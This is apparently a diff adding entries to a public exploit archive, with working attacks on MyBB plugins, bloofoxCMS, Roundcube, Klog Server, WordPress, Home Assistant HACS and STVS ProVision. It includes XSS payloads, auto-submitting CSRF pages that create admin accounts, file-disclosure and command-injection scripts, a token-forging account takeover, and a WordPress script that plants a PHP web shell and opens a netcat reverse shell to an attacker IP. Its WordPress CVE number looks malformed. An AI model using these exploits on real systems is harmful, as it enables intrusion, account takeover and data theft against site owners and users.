+# Exploit Title: MyBB Trending Widget Plugin 1.2 - Cross-Site Scripting
+# Date: 11/28/2018
+# Author: 0xB9
+# Software Link: https://github.com/zainali99/trends-widget
+# Version: 1.2
+# Tested on: Windows 10
+
+1. Description:
+This plugin shows the most trending threads. Trending thread titles aren't sanitized to user input.
+
+2. Proof of Concept:
+
+- Have a trending thread in the widget
+- Change the thread title to a payload   <script>alert('XSS')</script>
+Anyone that visits the forum will execute payload
\ No newline at end of file
diff --git a/exploits/php/webapps/49505.txt b/exploits/php/webapps/49505.txt
new file mode 100644
index 000000000..ad1b56d39
--- /dev/null
+++ b/exploits/php/webapps/49505.txt
@@ -0,0 +1,16 @@
+# Exploit Title: MyBB Thread Redirect Plugin 0.2.1 - Cross-Site Scripting
+# Date: 7/23/2018
+# Author: 0xB9
+# Software Link: https://github.com/jamiesage123/Thread-Redirect
+# Version: 0.2.1
+# Tested on: Windows 10
+
+1. Description:
+This plugin allows threads to redirect to a URL with optional custom text. The custom text input is vulnerable to Cross-Site Scripting.
+
+2. Proof of Concept:
+
+- Create a new thread
+- Input any Thread Subject and Redirect URL you'd like
+- Use the following payload for Your Message     <svg/onload=alert('XSS')>
+Anyone who views the thread will execute payload.
\ No newline at end of file
diff --git a/exploits/php/webapps/49507.html b/exploits/php/webapps/49507.html
new file mode 100644
index 000000000..025de70ca
--- /dev/null
+++ b/exploits/php/webapps/49507.html
@@ -0,0 +1,48 @@
+# Title: bloofoxCMS 0.5.2.1 - CSRF (Add user)
+# Exploit Author: LiPeiYi
+# Date: 2020-12-18
+# Vendor Homepage: https://www.bloofox.com/
+# Software Link: https://github.com/alexlang24/bloofoxCMS/releases/tag/0.5.2.1
+# Version: 0.5.1.0 -.5.2.1
+# Tested on: windows 10
+
+#Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site
+
+###PoC
+<script type="text/javascript">
+function post(url,fields)
+{
+var p = document.createElement("form");
+p.action = url;
+p.innerHTML = fields;
+p.target = "_self";
+p.method = "post";
+document.body.appendChild(p);
+p.submit();
+}
+function csrf_hack()
+{
+var fields;
+
+fields += "<input type='hidden' name='username' value='testuser01' />";
+fields += " <input type='hidden' name='password' value='testpw123' />";  
+fields += " <input type='hidden' name='pwdconfirm' value='testpw123' />";  
+fields += "<input type='hidden' name='3' value='Admin' />";  
+fields += " <input type='hidden' name='blocked' value='0' />";  
+fields += "<input type='hidden' name='deleted' value='0' />";  
+fields += "<input type='hidden' name='status' value='1' />";  
+fields += "<input type='hidden' name='login_page' value='0' />";  
+fields += "<input type='hidden' name='send' value='Add+User' />";  
+
+
+var url = "http://test.com/admin/index.php?mode=user&action=new&submit=send";
+post(url,fields);
+}
+window.onload = function() { csrf_hack();}
+</script>
+
+</body>
+</html>
+
+
+exp detail：https://github.com/alexlang24/bloofoxCMS/issues/4
\ No newline at end of file
diff --git a/exploits/php/webapps/49509.txt b/exploits/php/webapps/49509.txt
new file mode 100644
index 000000000..72931224a
--- /dev/null
+++ b/exploits/php/webapps/49509.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Vehicle Parking Tracker System 1.0 - 'Owner Name'  Stored Cross-Site Scripting
+# Date: 2021-01-30
+# Exploit Author: Anmol K Sachan
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/
+# Software: : Vehicle Parking Tracker System 
+# Version : 1.0
+# Vulnerability Type: Cross-site Scripting
+# Tested on Windows 10 XAMPP
+# This application is vulnerable to Stored XSS vulnerability.
+# Vulnerable script:
+
+1) http://localhost/vpms/add-vehicle.php
+# Vulnerable parameters: 'Owner Name'
+# Payload used: ()"><script>alert(‘document.cookie’)</script>
+# POC: manage-incomingvehicle.php
+# You will see your Javascript code executed.
\ No newline at end of file
diff --git a/exploits/php/webapps/49510.py b/exploits/php/webapps/49510.py
new file mode 100755
index 000000000..e4a48585e
--- /dev/null
+++ b/exploits/php/webapps/49510.py
@@ -0,0 +1,60 @@
+# Exploit Title: Roundcube Webmail 1.2 - File Disclosure 
+# Date: 09-11-2017
+# Exploit Author: stonepresto
+# Vendor Homepage: https://roundcube.net/
+# Software Link: https://sourceforge.net/projects/roundcubemail/files/roundcubemail-beta/1.2-beta/
+# Version: 1.1.0 - 1.1.9, 1.2.0 - 1.2.6, 1.3.0 - 1.3.2
+# Tested on: roundcube version 1.2-beta
+# CVE : CVE-2017-16651
+
+#!/usr/bin/env python3
+# Reference: https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1
+# https://github.com/stonepresto/CVE-2017-16651
+# Exploit Author: stonepresto
+
+import requests
+import re
+import sys
+
+URL="https://127.0.0.1/"
+USER="user@example.com"
+PASS="password"
+
+def main():
+    s = requests.Session()
+    r = s.get(URL,params={"_task":"login"},verify=False)
+    token = None
+    for line in r.text.split("\n"):
+        if 'name="_token"' in line:
+            token = line.split("value=")[1].split('"')[1]
+            print("[+] token: %s" % token)
+    if token is None:
+        print("[!] unable to retrieve token")
+        sys.exit(1)
+
+    data = {
+        "_token":token,
+        "_task":"login",
+        "_action":"login",
+        "_timezone[files][1][path]":sys.argv[1],
+        "_url":"_task%3Dlogin",
+        "_user":USER,
+        "_pass":PASS
+    }
+    r = s.post(URL,params={"_task":"login"},data=data,verify=False)
+
+    params = {
+        "_task":"settings",
+        "_action":"upload-display",
+        "_from":"timezone",
+        "_file":"rcmfile1"
+    }
+
+    r = s.get(URL,params=params,verify=False)
+    print(r.text)
+
+if __name__ == "__main__":
+    if len(sys.argv) != 2:
+        print("[!] Usage: %s <file-to-read>" % sys.argv[0])
+    else:
+        main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49511.py b/exploits/php/webapps/49511.py
new file mode 100755
index 000000000..6ec501986
--- /dev/null
+++ b/exploits/php/webapps/49511.py
@@ -0,0 +1,86 @@
+# Exploit Title: Klog Server 2.4.1 - Command Injection (Authenticated)
+# Date: 26.01.2021
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.klogserver.com/
+# Version: 2.4.1
+# Description: https://docs.unsafe-inline.com/0day/klog-server-authenticated-command-injection
+# CVE: 2021-3317
+
+"""
+Description:
+"source" parameter is executed via shell_exec() function without input validation in async.php file.
+
+Example:
+python3 PoC.py --target 10.10.56.51 --username admin --password admin --command id 
+[*] Status Code for login request: 302
+[+] Authentication was successful!
+[*] Exploiting...
+
+uid=48(apache) gid=48(apache) groups=48(apache)
+
+"""
+
+import argparse
+import requests
+import sys
+import urllib3
+from argparse import ArgumentParser, Namespace
+
+
+def main():
+    dsc = "Klog Server 2.4.1 - Command Injection (Authenticated)"
+    parser: ArgumentParser = argparse.ArgumentParser(description=dsc)
+    parser.add_argument("--target", help="IPv4 address of Cockpit server", type=str, required=True)
+    parser.add_argument("--username", help="Username", type=str, required=True)
+    parser.add_argument("--password", help="Password", type=str, required=True)
+    parser.add_argument("--command", help="Command", type=str, required=True)
+    args: Namespace = parser.parse_args()
+    if args.target:
+        target = args.target
+        if args.username:
+            username = args.username
+            if args.password:
+                password = args.password
+                if args.command:
+                    command = args.command
+
+                exploit(target, username, password, command)
+
+
+def exploit(target, username, password, command):
+    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+    s = requests.Session()
+    headers = {
+    	"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
+         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+         "Accept-Language": "en-US,en;q=0.5",
+         "Accept-Encoding": "gzip, deflate",
+         "Content-Type": "application/x-www-form-urlencoded",
+         "Connection": "close",
+         "Upgrade-Insecure-Requests": "1",
+         }
+    
+    data = {"user" : username, "pswd" : password}
+
+    login = s.post("https://" + target + "/actions/authenticate.php" , data=data, headers=headers, allow_redirects=False, verify=False)
+    print("[*] Status Code for login request: " + str(login.status_code))
+
+    if login.status_code == 302:
+        check = s.get("https://" + target + "/index.php", allow_redirects=False, verify=False)
+        if check.status_code == 200:
+            print("[+] Authentication was successful!")
+        else:
+            print("[-] Authentication was unsuccessful!")
+            sys.exit(1)
+    else:
+        print("Something went wrong!")
+        sys.exit(1)
+        
+    print("[*] Exploiting...\n")
+
+    executeCommand = s.get("https://" + target + "/actions/async.php?action=stream&source=;"+ command +";", allow_redirects=False, verify=False)
+    print(executeCommand.text)
+    sys.exit(0)
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/49512.py b/exploits/php/webapps/49512.py
new file mode 100755
index 000000000..88aee6d58
--- /dev/null
+++ b/exploits/php/webapps/49512.py
@@ -0,0 +1,186 @@
+# Exploit Title: WordPress 5.0.0 - Image Remote Code Execution
+# Date: 2020-02-01
+# Exploit Authors: OUSSAMA RAHALI ( aka V0lck3r)
+# Discovery Author : RIPSTECH Technology
+# Version: WordPress 5.0.0 and <= 4.9.8 .
+# References : CVE-2019-89242 | CVE-2019-89242  | https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
+
+#/usr/bin/env python3
+
+import requests
+import re
+import sys
+from datetime import datetime
+
+banner = """
+
+__        __            _                           ____   ____ _____ 
+\ \      / /__  _ __ __| |_ __  _ __ ___  ___ ___  |  _ \ / ___| ____|
+ \ \ /\ / / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __| | |_) | |   |  _|  
+  \ V  V / (_) | | | (_| | |_) | | |  __/\__ \__ \ |  _ <| |___| |___ 
+   \_/\_/ \___/|_|  \__,_| .__/|_|  \___||___/___/ |_| \_\\____|_____|
+                         |_|                                        
+                         			5.0.0 and <= 4.9.8
+"""
+print(banner)
+print("usage :")
+print("=======")
+usage = 'python3 RCE_wordpress.py http://<IP>:<PORT>/ <Username> <Password> <WordPress_theme>'
+print(usage)
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+wp_theme = sys.argv[4] # wpscan results
+
+lhost = '10.10.10.10' #attacker ip
+lport = '4141' #listening port
+
+date = str(datetime.now().strftime('%Y'))+'/'+str(datetime.now().strftime('%m'))+'/'
+
+imagename = 'gd.jpg'
+# ======
+# Note :
+# ======
+# It could be any jpg image, BUT there are some modifications first : 
+# 1- image name as : "gd.jpg"
+# 2- place the image in the same directory as this exploit.
+# 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="<?=\`\$_GET[0]\`?>"
+
+data = {
+	'log':username,
+	'pwd':password,
+	'wp-submit':'Log In',
+	'redirect_to':url+'wp-admin/',
+	'testcookie':1
+}
+
+r = requests.post(url+'wp-login.php',data=data)
+
+if r.status_code == 200:
+	print("[+] Login successful.\n")
+else:
+	print("[-] Failed to login.")
+	exit(0)
+
+cookies = r.cookies
+
+print("[+] Getting Wp Nonce ... ")
+
+res = requests.get(url+'wp-admin/media-new.php',cookies=cookies)
+wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
+
+if len(wp_nonce_list) == 0 :
+	print("[-] Failed to retrieve the _wpnonce \n")
+	exit(0)
+else :
+	wp_nonce = wp_nonce_list[0]
+	print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce+"\n")
+
+print("[+] Uploading the image ... ")
+
+data = {
+	'name': 'gd.jpg',
+	'action': 'upload-attachment',
+	'_wpnonce': wp_nonce
+}
+
+image = {'async-upload': (imagename, open(imagename, 'rb'))}
+r_upload = requests.post(url+'wp-admin/async-upload.php', data=data, files=image, cookies=cookies)
+if r_upload.status_code == 200:
+	image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
+	_wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
+	print('[+] Image uploaded successfully ! Image ID :'+ image_id+"\n")
+else : 
+	print("[-] Failed to receive a response for uploaded image ! try again . \n")
+	exit(0)
+
+print("[+] Changing the path ... ")
+
+
+data = {
+	'_wpnonce':_wp_nonce,
+	'action':'editpost',
+	'post_ID':image_id,
+	'meta_input[_wp_attached_file]':date+imagename+'?/../../../../themes/'+wp_theme+'/rahali'
+}
+
+res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies)
+if res.status_code == 200:
+	print("[+] Path has been changed successfully. \n")
+else :
+	print("[-] Failed to change the path ! Make sure the theme is correcte .\n")
+	exit(0)
+
+print("[+] Getting Ajax nonce ... ")
+
+data = {
+	'action':'query-attachments',
+	'post_id':0,
+	'query[item]':43,
+	'query[orderby]':'date',
+	'query[order]':'DESC',
+	'query[posts_per_page]':40,
+	'query[paged]':1
+}
+
+res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies)
+ajax_nonce_list=re.findall(r',"edit":"(\w+)"',res.text)
+
+if res.status_code == 200 and len(ajax_nonce_list) != 0 :
+	ajax_nonce = ajax_nonce_list[0]
+	print('[+] Ajax Nonce retrieved successfully ! ajax_nonce : '+ ajax_nonce+'\n')
+else :
+	print("[-] Failed to retrieve ajax_nonce.\n")
+	exit(0)
+
+
+print("[+] Cropping the uploaded image ... ")
+
+data = {
+	'action':'crop-image',
+	'_ajax_nonce':ajax_nonce,
+	'id':image_id,
+	'cropDetails[x1]':0,
+	'cropDetails[y1]':0,
+	'cropDetails[width]':200,
+	'cropDetails[height]':100,
+	'cropDetails[dst_width]':200,
+	'cropDetails[dst_height]':100
+}
+
+res = requests.post(url+'wp-admin/admin-ajax.php',data=data, cookies=cookies)
+if res.status_code == 200:
+	print("[+] Done . \n")
+else :
+	print("[-] Erorr ! Try again \n")
+	exit(0)
+
+print("[+] Creating a new post to include the image... ")
+
+res = requests.post(url+'wp-admin/post-new.php', cookies=cookies)
+if res.status_code == 200:
+	_wpnonce = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)[0]
+	post_id = re.findall(r'"post":{"id":(\w+),',res.text)[0]
+	print("[+] Post created successfully . \n")
+else :
+	print("[-] Erorr ! Try again \n")
+	exit(0)
+
+data={
+	'_wpnonce':_wpnonce,
+	'action':'editpost',
+	'post_ID':post_id,
+	'post_title':'RCE poc by v0lck3r',
+	'post_name':'RCE poc by v0lck3r',
+	'meta_input[_wp_page_template]':'cropped-rahali.jpg'
+}
+res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies)
+if res.status_code == 200:
+	print("[+] POC is ready at : "+url+'?p='+post_id+'&0=id\n')
+	print("[+] Executing payload !")
+	requests.get(f"{url}?p={post_id}&0=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20{lhost}%20{lport}%20%3E%2Ftmp%2Ff",cookies=cookies)
+
+else :
+	print("[-] Erorr ! Try again (maybe change the payload) \n")
+	exit(0)
\ No newline at end of file
diff --git a/exploits/python/webapps/49495.py b/exploits/python/webapps/49495.py
new file mode 100755
index 000000000..63f12d569
--- /dev/null
+++ b/exploits/python/webapps/49495.py
@@ -0,0 +1,86 @@
+# Exploit Title: Home Assistant Community Store (HACS) 1.10.0 - Path Traversal to Account Takeover
+# Date: 2021-01-28
+# Exploit Author: Lyghtnox
+# Vendor Homepage: https://www.home-assistant.io/
+# Software Link: https://github.com/hacs/integration
+# Version: < 1.10.0
+# Tested on: Raspbian + Home Assistant 2021.1.0
+# Blog post: https://lyghtnox.gitlab.io/posts/hacs-exploit/
+
+# STEP 1: Run the exploit (python3 exploit.py host port)
+# STEP 2: Copy the token printed and set in your browser's local storage with
+# the key `hassTokens`
+
+import requests
+import jwt
+import json
+import argparse
+
+
+class HA:
+    def __init__(self, ip, port):
+        self.ip = ip
+        self.port = port
+
+    def retrieveFile(self, f):
+        url = f'http://{self.ip}:{self.port}/hacsfiles/../../{f}'
+        with requests.Session() as s:
+            r = requests.Request(method='GET', url=url)
+            prep = r.prepare()
+            prep.url = url
+            try:
+                r = s.send(prep, verify=False)
+            except requests.exceptions.ConnectionError:
+                return
+        if r.status_code == 400 or r.status_code == 404:
+            return
+        return r
+
+    def craftToken(self):
+        f = self.retrieveFile('.storage/auth').json()
+
+        # Find owner
+        for user in f['data']['users']:
+            if user['is_owner']:
+                self.owner = user['id']
+                break
+        else:
+            print("No owner found. Using first account")
+            self.owner = f['data']['users'][0]['id']
+
+        for token in f['data']['refresh_tokens']:
+            if self.owner == token['user_id']:
+                encoded_jwt = jwt.encode({'iss': token['id']},
+                                         token['jwt_key'],
+                                         algorithm="HS256")
+                self.token = {'access_token': encoded_jwt,
+                              'token_type': 'Bearer',
+                              'refresh_token': token['token'],
+                              'expires_in': 1800,
+                              'hassUrl': f"http://{self.ip}:{self.port}",
+                              'clientId': token['client_id']}
+                return self.token
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Exploit a vulnerability in \
+HACS < 1.10.0 to gain admin access to an Home Assistant instance.")
+    parser.add_argument("host", type=str, help="IP of the HASS instance")
+    parser.add_argument("port", type=int, help="port of the HASS instance")
+    args = parser.parse_args()
+
+    r = requests.get('http://{ip}:{port}/hacsfiles/iconset.js'.format(
+        ip=args.host,
+        port=args.port))
+    if r.status_code != 404:
+        print("HACS found! Testing vulnerability...", end='', flush=True)
+        ha = HA(args.host, args.port)
+        if ha.retrieveFile('configuration.yaml'):
+            print(": VULNERABLE")
+            token = ha.craftToken()
+            if token:
+                print(f"Use the following 'hassTokens': {json.dumps(token)}")
+            else:
+                print("Unable to craft token")
+        else:
+            print(": Not vulnerable")
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49481.txt b/exploits/ruby/webapps/49481.txt
new file mode 100644
index 000000000..500fedc0c
--- /dev/null
+++ b/exploits/ruby/webapps/49481.txt
@@ -0,0 +1,121 @@
+# Exploit Title: STVS ProVision 5.9.10 - File Disclosure (Authenticated)
+# Date: 19.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.stvs.ch
+
+
+STVS ProVision 5.9.10 (archive.rb) Authenticated File Disclosure Vulnerability
+
+
+Vendor: STVS SA
+Product web page: http://www.stvs.ch
+Platform: Ruby
+Affected version:  5.9.10 (build 2885-3a8219a)
+                   5.9.9 (build 2882-7c3b787)
+                   5.9.7 (build 2871-a450938)
+                   5.9.1 (build 2771-1bbed11)
+                   5.9.0 (build 2701-6123026)
+                   5.8.6 (build 2557-84726f7)
+                   5.7
+                   5.6
+                   5.5
+
+Summary: STVS is a Swiss company specializing in development of
+software for digital video recording for surveillance cameras
+as well as the establishment of powerful and user-friendly IP
+video surveillance networks.
+
+Desc: The NVR software ProVision suffers from an authenticated
+arbitrary file disclosure vulnerability. Input passed through
+the files parameter in archive download script (archive.rb) is
+not properly verified before being used to download files. This
+can be exploited to disclose the contents of arbitrary and sensitive
+files.
+
+Tested on: Ubuntu 14.04.3
+           nginx/1.12.1
+           nginx/1.4.6
+           nginx/1.1.19
+           nginx/0.7.65
+           nginx/0.3.61
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5623
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5623.php
+
+19.01.2021
+
+--
+
+
+#1 LFI Prober (FP):
+-------------------
+
+GET /archive/download?files=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
+Host: 192.168.1.17
+Authorization: Digest username="admin", realm="ProVision", nonce="MjAyMS0wMS0xOSAwMDowNjo0NTo2OTMwMTE6NDk2MmVkNzM2OWIxNzMzNzRjZDc3YzY0NjM3MmNhNz", uri="/archive/download", algorithm=MD5, response="aceffbb0a121570f98a9f4678470a588", opaque="3c837ec895bd5fedcdad8674184de82e", qop=auth, nc=000001ca, cnonce="ebed759486b87a80"
+Accept: application/json, text/javascript, */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Origin: http://192.168.1.17
+Referer: http://192.168.1.17/archive
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: last_stream=1; __flash__info=
+Connection: close
+
+HTTP/1.1 500 Not Found
+Server: nginx/1.4.6 (Ubuntu)
+Date: Mon, 18 Jan 2021 23:23:30 GMT
+Content-Type: text/html
+Content-Length: 2727
+Connection: close
+
+<h1>`Archive` application problem</h1><h2>Archive::Controllers::FileDownload.GET</h2><h3>TypeError can't convert nil into String:</h3><ul><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'</li><li>/usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'</li><li>(eval):27:in `send'</li><li>(eval):27:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/security.rb:79:in `service'</li><li>/usr/local/lib/ruby/site_ruby/1.8/ext/forward.rb:54:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/camping-1.5.180/lib/camping/reloader.rb:117:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:53:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `synchronize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/camping.rb:52:in `process'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:626:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:625:in `process_client'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:751:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `initialize'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `new'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel.rb:735:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:282:in `run'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `each'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:281:in `run'</li><li>/usr/local/bin/provision_server:69:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:149:in `listener'</li><li>/usr/local/bin/provision_server:63:in `cloaker_'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `call'</li><li>/usr/local/lib/ruby/gems/1.8/gems/mongrel-1.0.5/lib/mongrel/configurator.rb:50:in `initialize'</li><li>/usr/local/bin/provision_server:62:in `new'</li><li>/usr/local/bin/provision_server:62</li></ul>
+
+
+#2 LFI Prober (Verified):
+-------------------------
+
+$ curl "http://192.168.1.17/archive//download/%2Fetc%2Fpasswd"
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+libuuid:x:100:101::/var/lib/libuuid:
+syslog:x:101:104::/home/syslog:/bin/false
+mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
+provision:x:999:107::/srv/provision/provision:/bin/bash
+stvs:x:1000:100::/home/stvs:/bin/bash
+usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
+ntp:x:104:108::/home/ntp:/bin/false
+messagebus:x:105:110::/var/run/dbus:/bin/false
+sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
+statd:x:107:65534::/var/lib/nfs:/bin/false
+
+
+--
+Errno::ENOENT No such file or directory - /var/www/index.html:
+
+    /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `initialize'
+    /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `new'
+    /usr/local/lib/ruby/site_ruby/1.8/apps/archive.rb:392:in `get'
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49482.html b/exploits/ruby/webapps/49482.html
new file mode 100644
index 000000000..7241490c7
--- /dev/null
+++ b/exploits/ruby/webapps/49482.html
@@ -0,0 +1,66 @@
+# Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
+# Date: 19.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.stvs.ch
+
+STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)
+
+
+Vendor: STVS SA
+Product web page: http://www.stvs.ch
+Platform: Ruby
+Affected version:  5.9.10 (build 2885-3a8219a)
+                   5.9.9 (build 2882-7c3b787)
+                   5.9.7 (build 2871-a450938)
+                   5.9.1 (build 2771-1bbed11)
+                   5.9.0 (build 2701-6123026)
+                   5.8.6 (build 2557-84726f7)
+                   5.7
+                   5.6
+                   5.5
+
+Summary: STVS is a Swiss company specializing in development of
+software for digital video recording for surveillance cameras
+as well as the establishment of powerful and user-friendly IP
+video surveillance networks.
+
+Desc: The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks
+to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits
+a malicious web site.
+
+Tested on: Ubuntu 14.04.3
+           nginx/1.12.1
+           nginx/1.4.6
+           nginx/1.1.19
+           nginx/0.7.65
+           nginx/0.3.61
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5625
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php
+
+19.01.2021
+
+--
+
+
+<html>
+  <body>
+    <form action="http://192.168.1.17/users/create" method="POST">
+      <input type="hidden" name="login" value="testingus" />
+      <input type="hidden" name="password" value="testingus" />
+      <input type="hidden" name="confirm&#95;password" value="testingus" />
+      <input type="hidden" name="email" value="test&#64;test&#46;tld" />
+      <input type="hidden" name="role&#95;id" value="1" />
+      <input type="hidden" name="never&#95;expire" value="on" />
+      <input type="hidden" name="disabled&#95;acc" value="false" />
+      <input type="submit" value="Forge request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/windows/local/49116.py b/exploits/windows/local/49116.py
index 77ce33d1d..8ebe69c8d 100755
--- a/exploits/windows/local/49116.py
+++ b/exploits/windows/local/49116.py
@@ -1,5 +1,5 @@
 # Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
-# Date: August 29, 2020
+# Date: 2020-08-29
 # Exploit Author: CrossWire
 # Vendor Homepage: https://www.foxitsoftware.com/
 # Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
diff --git a/files_exploits.csv b/files_exploits.csv
index a0734ca12..7d67ae04c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -55,13 +55,13 @@ id,file,description,date,author,type,platform,port
 356,exploits/windows/dos/356.c,"OverByte ICS FTP Server - Remote Denial of Service",2004-07-20,ATmaCA,dos,windows,
 357,exploits/windows/dos/357.c,"Medal of Honor - Remote Buffer Overflow (PoC)",2004-07-20,"Luigi Auriemma",dos,windows,
 358,exploits/hardware/dos/358.txt,"Lexmark Multiple HTTP Servers - Denial of Service",2004-07-22,"Peter Kruse",dos,hardware,
-360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers Denial of Service (Perl)",2004-07-22,bkbll,dos,multiple,80
+360,exploits/multiple/dos/360.pl,"Apache - Arbitrary Long HTTP Headers (Denial of Service)",2004-07-22,bkbll,dos,multiple,80
 362,exploits/windows/dos/362.sh,"Xitami Web Server - Denial of Service",2004-07-22,CoolICE,dos,windows,
 363,exploits/hardware/dos/363.txt,"Conceptronic CADSLR1 Router - Denial of Service",2004-07-22,"Seth Alan Woolley",dos,hardware,
-365,exploits/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,dos,windows,
